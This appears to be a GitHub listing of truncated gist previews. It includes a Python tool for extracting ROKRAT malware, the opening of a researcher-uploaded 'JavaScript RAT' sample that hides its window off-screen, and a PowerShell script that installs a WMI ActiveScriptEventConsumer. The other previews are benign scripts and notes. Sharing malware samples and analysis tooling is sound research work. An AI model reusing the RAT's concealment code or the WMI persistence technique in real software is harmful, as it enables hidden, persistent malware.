Skip to content

Instantly share code, notes, and snippets.

View gnh1201's full-sized avatar
🍉
Your Watermelon OPEN UP!

Namhyeon, Go gnh1201

🍉
Your Watermelon OPEN UP!
View GitHub Profile
@seclib
seclib / payload-rokrat.py
Created July 7, 2018 18:34
Python malware extraction for 2018-07-05 HWP ROKRAT dropper
#extract malware from: 9e6ff58202f6c1bd2381e8209231efd0ef6855db59db975fb5b75041706ed104
import re
import sys
import zlib
import struct
import hashlib
import oledump
import olefile
import binascii
import cStringIO
@JohnLaTwC
JohnLaTwC / JavaScript RAT
Created February 9, 2018 17:05
JavaScript RAT
## uploaded by @JohnLaTwC
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde
<html>
<head>
<script language="JScript">
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();
try
@pstehlik
pstehlik / ipfs_install.sh
Created February 4, 2018 22:36
Install IPFS on Ubuntu 16.04 64bit and set up as systemd service
#!/bin/bash
#pick your IPFS version
VERS=0.4.13
DIST="go-ipfs_v${VERS}_linux-amd64.tar.gz"
sudo apt-get update
sudo apt-get install golang-go -y
wget https://dist.ipfs.io/go-ipfs/v0.4.13/$DIST
tar xvfz $DIST
@mgreen27
mgreen27 / ActiveScriptEventConsumer.ps1
Last active January 13, 2022 01:22
PowerShell script to install an ActiveScriptEventConsumer
# PowerShell 2.0+
# Description: Powershell script to add Event Consumer
# Original Template (Eventlog Consumer) attributed to @mattifestation: https://gist.github.com/mattifestation/aff0cb8bf66c7f6ef44a
# Set Variables
$Name = 'StagingLocation_Example'
$Query = 'SELECT * FROM __InstanceCreationEvent WITHIN 30 WHERE TargetInstance ISA "CIM_DataFile" AND TargetInstance.Drive = "C:" AND TargetInstance.Path = "\\Windows\\VSS\\"'
$EventNamespace = 'root/cimv2'
$Class = 'ActiveScriptEventConsumer'
@drmalex07
drmalex07 / README-setup-tunnel-as-systemd-service.md
Last active November 8, 2024 00:56
Setup a secure (SSH) tunnel as a systemd service. #systemd #ssh #ssh-tunnel #ssh-forward

README

Create a template service file at /etc/systemd/system/[email protected]. The template parameter will correspond to the name of target host:

[Unit]
Description=Setup a secure tunnel to %I
After=network.target
@mbostock
mbostock / .block
Last active January 16, 2020 05:25
Lab Color Picker
license: gpl-3.0
@tijnkooijmans
tijnkooijmans / crc16.c
Created April 17, 2014 12:53
CRC-16/CCITT-FALSE
uint16_t crc16(char* pData, int length)
{
uint8_t i;
uint16_t wCrc = 0xffff;
while (length--) {
wCrc ^= *(unsigned char *)pData++ << 8;
for (i=0; i < 8; i++)
wCrc = wCrc & 0x8000 ? (wCrc << 1) ^ 0x1021 : wCrc << 1;
}
return wCrc & 0xffff;
@TheRatG
TheRatG / mod_proxy
Last active September 19, 2018 18:13
mod_proxy
http://www.hackersgarage.com/install-mod_proxy-apache-module-on-whmcpanel-ceentos-linux-server.html
Installation :
Check Apache current version :
/usr/local/apache/bin/httpd -v
Output :
Server version: Apache/2.2.19 (Unix)
@iron9light
iron9light / encoder.js
Created September 3, 2011 16:07
Windows jscript base64 encoder. Drag and drop files you wanna encode to this .js file.
var fsDoOverwrite = true // Overwrite file with base64 code
var fsAsASCII = false // Create base64 code file as ASCII file
var adTypeBinary = 1 // Binary file is encoded
function encode(from, to) {
var inputStream = WScript.CreateObject("ADODB.Stream");
inputStream.Type = adTypeBinary
inputStream.Open();
inputStream.LoadFromFile(from);